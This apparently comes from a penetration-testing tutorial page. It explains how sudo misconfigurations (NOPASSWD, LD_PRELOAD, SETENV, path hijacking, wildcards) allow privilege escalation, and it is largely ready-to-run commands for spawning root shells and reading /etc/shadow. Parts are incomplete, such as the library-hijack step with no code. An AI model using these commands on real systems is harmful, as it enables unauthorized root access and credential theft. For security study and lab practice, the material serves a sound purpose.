On this page, we speak about specific SUDO misconfigurations that can be leveraged to subvert sudo's intended functionality and elevate our privileges.
Practice
NOPASSWD
The following sudo configuration allow an user to execute some command with another user's privileges without knowing the password.
$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim
If you can run a binary with sudo rights, you may want to have look at GTFOBins, a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with vim, we can spawn a shell with following commands:
sudo -u root vim -c '!sh'
LD_PRELOAD
LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.
If env_keep+=LD_PRELOAD is explicitly defined in the sudo -l output and you can call some command with sudo, you can escalate your privileges.
$ sudo -l
env_reset, env_keep+=LD_PRELOAD
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/find
Use one of the shared objects in the list and we will hijack it by creating a file with same name. For this demonstration, we will be targeting the libpcre2-8.so.0 file.
Then run the sudo binary with LD_LIBRARY_PATH environement variable
#Use any command you can run with sudo
sudo LD_LIBRARY_PATH=/tmp <COMMAND>
#Example
sudo LD_LIBRARY_PATH=/tmp /usr/bin/find
SETENV
This SETENVdirective allows the user to set an environment variable while executing something:
#Setenv on an arbitrary binary/script
$ sudo -l
env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
#Setenv on binary/script without the full command path
$ sudo -l
env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
(ALL) SETENV: find
The previous example, based on HTB machine Admirer, was vulnerable to PYTHONPATH hijacking to load an arbitrary python library while executing the script as root:
#Sudo with modified PYTHONPATH
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
Or, you can set the PATH env variable if you can sudo on a binary without the full command path specified.
#Create a malicious find executable
echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find
#Sudo with modified PATH
sudo PATH=/tmp:$PATH find
Command Path Hijacking
If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead we need to check if we have permission to write each path if a the sudo binary is specified without the full command path.
$ sudo -l
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User demo may run the following commands on crashlab:
(root) python /home/user/example.py
We need to check if we have permission to write each path.
ls -al /usr/local/
ls -al /usr/
ls -al /
Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there. For example, we create a python binary under /usr/sbin.
If we can execute some command as root and it contains a wildcard. We may use symlinks, path traversal or multiple arguments to exploit it.
$ sudo -l
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User demo may run the following commands on crashlab:
(root): /bin/less /var/log/*
We can exploit it by using path traversal technique
sudo less /var/log/../../etc/shadow
or we can exploit it by using symlinks technique
ln /etc/shadow /var/log/new
sudo less /var/log/new